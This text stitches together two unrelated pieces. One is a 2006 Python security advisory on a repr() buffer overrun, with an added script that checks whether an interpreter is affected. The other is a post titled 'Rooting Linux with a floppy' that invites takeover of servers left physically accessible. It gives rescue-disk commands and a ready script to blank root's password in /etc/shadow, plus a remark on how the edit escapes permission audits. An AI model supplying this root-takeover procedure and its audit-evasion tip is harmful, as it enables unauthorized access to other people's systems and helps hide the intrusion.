Buffer overrun in repr() for UCS-4 encoded unicode strings

Python Security Advisory


Advisory ID: PSF-2006-001
Issue Date: October 12, 2006
Product: Python
Versions: 2.2, 2.3 prior to 2.3.6, 2.4 prior to 2.4.4, wide unicode (UCS-4) builds only
CVE Names: CAN-2006-4980

Python is an interpreted, interactive, object-oriented programming language. It is often compared to Tcl, Perl, Scheme or Java.

The Python development team has discovered a flaw in the repr() implementation of Unicode string objects which can lead to execution of arbitrary code due to an overflow in a buffer allocated with insufficient size. The buffer that receives the escaped representation is sized for at most six output characters per input character (a \uXXXX escape), but on a UCS-4 build characters above U+FFFF are written as ten-character \UXXXXXXXX escapes, so a string containing enough such characters writes past the end of the allocation. Because repr() is called implicitly in many places (the %r format specifier, the interactive prompt, exception and logging messages), the overflow can be reached with attacker-supplied data that an application never explicitly represents.

The flaw only manifests itself in Python builds configured to support UCS-4 Unicode strings (using the --enable-unicode=ucs4 configure flag). This is still not the default for a source build, which is why the vulnerability should not be present in the Windows or Mac OS X builds provided by www.python.org. Several Linux distributions (Red Hat/Fedora and Debian among them) do build their Python packages with UCS-4, however, so do not assume a packaged interpreter is safe: check it as described below.

You can find out whether you are running a UCS-4 enabled build by looking at the sys.maxunicode attribute: it is 65535 in a UCS-2 build and 1114111 in a UCS-4 build.
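A small script for that check, added here and not part of the PSF advisory: it encodes the advisory's affected-version rules together with the sys.maxunicode test so it can be run against every interpreter on a host. The function names are this example's own, and the interpreter path passed to check_running_python is an assumption.

```shell
#!/bin/sh
# Added example (not from the PSF advisory): is a given Python build in
# the PSF-2006-001 affected set?  Arguments: version string ("2.4.3")
# and the build's sys.maxunicode.  Affected means a wide (UCS-4) build,
# sys.maxunicode == 1114111, running 2.2.x (any), 2.3.x with x < 6 or
# 2.4.x with x < 4.  2.5 and later contain the fix.
psf_2006_001_affected() {
    version=$1
    maxunicode=$2

    # Narrow (UCS-2) builds are not affected whatever the version.
    [ "$maxunicode" -eq 1114111 ] || return 1

    # Split "major.minor.micro"; a missing micro counts as 0, and a
    # release-candidate suffix such as the "c1" in "2.4.4c1" is ignored.
    major=${version%%.*}
    rest=${version#*.}
    minor=${rest%%.*}
    micro=${rest#*.}
    [ "$micro" = "$rest" ] && micro=0
    micro=${micro%%[!0-9]*}
    [ -n "$micro" ] || micro=0

    [ "$major" -eq 2 ] || return 1
    case "$minor" in
        2) return 0 ;;                 # every 2.2.x; only the patch is available
        3) [ "$micro" -lt 6 ] ;;       # fixed in 2.3.6
        4) [ "$micro" -lt 4 ] ;;       # fixed in 2.4.4
        *) return 1 ;;                 # 2.5 and later ship the fix
    esac
}

# Query a real interpreter (the advisory's sys.maxunicode test) and run
# the result through the check.  print(...) with one argument works on
# Python 2 and 3 alike.  Returns 2 if the interpreter cannot be run.
check_running_python() {
    py=${1:-python}                    # assumption: the interpreter to test
    v=$("$py" -c 'import sys; print("%d.%d.%d" % sys.version_info[:3])') || return 2
    m=$("$py" -c 'import sys; print(sys.maxunicode)') || return 2
    if psf_2006_001_affected "$v" "$m"; then
        echo "$py $v (sys.maxunicode=$m): AFFECTED by PSF-2006-001, patch or upgrade"
        return 0
    fi
    echo "$py $v (sys.maxunicode=$m): not affected"
    return 1
}

# Usage on a host with several interpreters installed:
#   for p in /usr/bin/python2.2 /usr/bin/python2.3 /usr/bin/python2.4; do
#       check_running_python "$p"
#   done
```

The version test alone is not enough: a 2.4.3 built with --enable-unicode=ucs2 is safe, while the same version packaged by a UCS-4 distribution is not, which is why the function insists on both conditions.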

More information can be found in this posting to the python-dev mailing list: http://mail.python.org/pipermail/python-dev/2006-October/069260.html

The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2006-4980 (listed as CVE-2006-4980 under the current naming scheme) to this issue.

Python 2.4.4 and Python 2.3.6 are available from www.python.org and contain a fix for this issue. Python 2.5 also contains the fix and is not vulnerable.

Patches for Python 2.2, 2.3 and 2.4 are also immediately available:

* http://python.org/files/news/security/PSF-2006-001/patch-2.3.txt (Python 2.2, 2.3)
* http://python.org/files/news/security/PSF-2006-001/patch-2.4.txt (Python 2.4)

Acknowledgement: thanks to Benjamin C. Wiley Sittler for discovering this issue.

reference:python.org

Rooting Linux with a floppy

You have lost your root password on your Linux box and are now considering formatting
everything to regain control? Your admin is a moron who leaves the server physically
accessible to everybody? You want to test your Linux box? Don't worry: if you have at least
a floppy rescue disk at hand, you can root it ;-)

The problem with newer distributions (the post cites version 6.2, presumably Red Hat Linux 6.2) is:

a) the shadow suite is installed by default, so the password hashes are moved out of the
world-readable /etc/passwd into /etc/shadow, which only root can read;

b) passwords are hashed with MD5-crypt (a 34-character $1$... hash instead of the 13-character
traditional DES hash), which is far slower to crack.

So it is not as easy as in the previous versions: simply grabbing /etc/passwd and running
JtR (John the Ripper) against it doesn't work anymore, because the hashes are no longer in it.

What to do now? Follow the guide :

1- Boot from the rescue disk

2- Press the key the boot menu indicates for rescue mode (e.g. F4)

3- At the boot prompt type: linux rescue (to enter rescue mode)

4- $ mknod /dev/hda b 3 0 (create the block device node for the first IDE disk if the rescue
RAM disk does not already have one: block major 3, minor 0 is the whole disk)

* * * N o t e * * *

If you have more than one partition on your HD, check which one is the Linux partition:

A- $ fdisk /dev/hda

B- at the fdisk prompt, p prints the partition table and m lists the commands; the Linux
partition is the one with type 83

5- $ mknod /dev/hda2 b 3 2 (create the node for partition 2, e.g. when a DOS partition is the
first primary partition; the minor number is the partition number)

6- $ mkdir /data (create a mount point in the rescue system's RAM disk)

7- $ mount -t ext2 /dev/hda2 /data (mount the Linux partition there; use -t ext3 if the
system's root filesystem is ext3)

8- $ cd /data/etc

9- $ chmod u+w /data/etc/shadow (optional: the rescue shell runs as root, which can write the
file regardless of its mode, and vi's :wq! forces the write anyway; chmod 700 adds nothing
useful, and if you do change the mode, restore it afterwards, e.g. chmod 400 /data/etc/shadow)

10- $ /data/bin/vi /data/etc/shadow (edit the shadow file with the vi from the mounted system,
in case the rescue disk has none)

11- in command mode (do not press i, that enters insert mode where x is typed literally), move
the cursor to the first character of root's hash, the field between the first and second
colons, and press x repeatedly until the field is empty, so the line starts with root::

12- press the Escape key, then ":"

13- save the file with wq! (the ! forces the write even though the file is read-only)

At this point vi has written the change to the mounted partition, but the kernel may still
hold it in its page cache rather than on the disk, so unmount cleanly (or run sync) before
powering off. DON'T JUST HIT RESET!!

14- $ cd / (leave the mount point)

15- $ umount /data (flushes the remaining writes to the disk)

16- $ reboot (or init 6; note that init 0 halts the machine rather than rebooting it)

Now you can log in as root with an empty password: just press Enter at the password prompt. This works wherever the login stack accepts empty passwords (pam_unix with nullok on Red Hat-era systems); if it refuses, put a hash you know the password for into the field instead of blanking it. The lesson for the admin is the usual one: whoever can boot the machine from their own media owns it, so fix the BIOS boot order, password the BIOS and the boot loader, or encrypt the disk.
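The same sequence as a script, an added example that is not part of Just1ce's post. The vi step is replaced by awk so the edit can be verified on a copy before and after touching the real file, and either blanking the field or inserting a known hash is supported. The device (/dev/hda2), mount point (/data) and filesystem type (ext2) are the post's assumptions, the function names are this example's own, and the shadow lines in the test are constructed.

```shell
#!/bin/sh
# Added example, not from the original post.  Replaces the interactive vi
# edit with awk and wraps steps 4 to 16 in one function.  /dev/hda2, /data
# and ext2 are the post's assumptions; check fdisk before using real devices.

# Replace the hash field of one account in a shadow file, in place.
# Shadow records are colon-separated:
#   name:hash:lastchg:min:max:warn:inact:expire:reserved
# An empty hash means "no password needed" where the login stack allows
# empty passwords; where it does not, pass a real MD5-crypt hash instead
# (e.g. the $1$ hash printed by "openssl passwd -1 newpass").
set_shadow_password() {
    shadow=$1
    user=$2
    newhash=$3                     # empty string clears the password
    cp -p "$shadow" "$shadow.bak" || return 1
    awk -F: -v u="$user" -v h="$newhash" \
        'BEGIN { OFS=":" } $1 == u { $2 = h } { print }' \
        "$shadow" > "$shadow.tmp" || return 1
    # Write back through the existing inode so owner and mode (0400/0640)
    # survive; "mv" would give the file the rescue shell's umask instead.
    cat "$shadow.tmp" > "$shadow" && rm -f "$shadow.tmp"
}

blank_shadow_password() {
    set_shadow_password "$1" "${2:-root}" ""
}

# Read the hash field back, to confirm the edit before unmounting.
shadow_password_field() {
    awk -F: -v u="$2" '$1 == u { print $2 }' "$1"
}

# Steps 4 to 16 of the post, run as root in the rescue shell.
reset_root_password_on_disk() {
    dev=${1:-/dev/hda2}            # assumption: the Linux (type 83) partition
    fstype=${2:-ext2}              # ext3 on journalled systems
    mnt=/data
    # Rescue RAM disks may lack device nodes.  IDE disks are block major 3;
    # minor 0 is the whole disk and minor N is partition N.
    part=${dev##*[!0-9]}
    [ -e /dev/hda ] || mknod /dev/hda b 3 0
    [ -e "$dev" ]   || mknod "$dev" b 3 "${part:-0}"
    mkdir -p "$mnt"
    mount -t "$fstype" "$dev" "$mnt" || return 1
    blank_shadow_password "$mnt/etc/shadow" root || return 1
    echo "root hash field is now: '$(shadow_password_field "$mnt/etc/shadow" root)'"
    cd /
    sync                           # push cached writes to the disk
    umount "$mnt"
    echo "done; reboot with 'reboot' or 'init 6' (init 0 only halts)"
}
```

Because set_shadow_password keeps a .bak copy and rewrites through the existing inode, the file keeps root:root ownership and its restrictive mode, so a later audit sees an unchanged permission set and only the modified hash field (and its mtime) betray the edit.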

Take care everyone, Just1ce.

reference:http://www.exploitx.com/69/rooting-linux-with-a-floppy/